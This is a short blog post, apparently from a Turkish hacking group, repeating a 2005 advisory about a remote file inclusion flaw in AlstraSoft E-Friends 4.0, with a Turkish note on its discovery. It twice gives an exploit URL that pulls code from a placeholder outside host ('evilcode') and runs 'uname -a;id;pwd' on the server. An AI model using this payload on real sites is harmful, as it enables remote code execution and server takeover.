AlstraSoft E-Friends "mode" File Inclusion Vulnerability
Vulnerable: AlstraSoft E-Friends 4.0AlstraSoft E-Friends is affected by a remote file include vulnerability.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
AlstraSoft E-Friends 4.0 is reported to be affected. Other versions may be vulnerable as well.
Vulerable : http://www.example.com/index.php?mode=http://evilcode?&cmd=uname -a;id;pwd
Referans
http://www.securityfocus.com/bid/14932
09/22/2005 tarihinde Kurdish Hackers Clan üyelerince, AlstraSoft Arkadaslık scriptinde uzaktan kod calıstırma açığı tespit edilmiştir.
Açık sayesinde script'e uzaktan erişim sağlanabiliniyor.
http://www.site.com/index.php?mode=http://evilcode?&cmd=uname -a;id;pwd
posted by HACKED BY TurkStorm.Org - ADANALI - GeCeCi @ 12/03/2005 05:34:00 PM
0 Comments:
Yorum Gönder
Links to this post:
Bağlantı Oluştur
<< Home